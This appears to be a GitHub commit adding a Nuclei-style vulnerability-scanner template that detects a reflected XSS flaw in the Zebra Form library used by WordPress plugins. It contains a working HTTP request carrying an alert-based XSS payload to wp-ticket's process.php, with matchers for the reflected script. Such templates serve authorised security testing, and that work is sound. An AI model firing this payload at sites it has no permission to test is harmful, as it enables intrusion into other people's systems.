Create Zebra_Form_XSS.yaml

patch-1
SaN ThosH 2021-02-15 16:13:31 +05:30 committed by GitHub
parent 86a26f81ec
commit 91768dc160
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 45 additions and 0 deletions

View File

@ -0,0 +1,45 @@
id: Zebra_Form_XSS
info:
name: Zebra Form XSS
author: madrobot
severity: medium
reference: https://blog.wpscan.com/2021/02/15/zebra-form-xss-wordpress-vulnerability-affects-multiple-plugins.html
tags: wordpress,xss
# References:
# https://blog.wpscan.com/2021/02/15/zebra-form-xss-wordpress-vulnerability-affects-multiple-plugins.html
requests:
- raw:
- |
POST /wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php?form=%3C/script%3E%3Cimg%20src%20onerror=alert(/XSS-form/)%3E&control=upload HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------77916619616724262872902741074
Content-Length: 241
Origin: null
Connection: close
Upgrade-Insecure-Requests: 1
-----------------------------77916619616724262872902741074
Content-Disposition: form-data; name="upload"; filename="a.txt"
Content-Type: text/plain
Test
-----------------------------77916619616724262872902741074--
matchers-condition: and
matchers:
- type: word
regex:
- "</script><img src onerror=alert(/XSS-form/)>"
part: body
- type: status
status:
- 200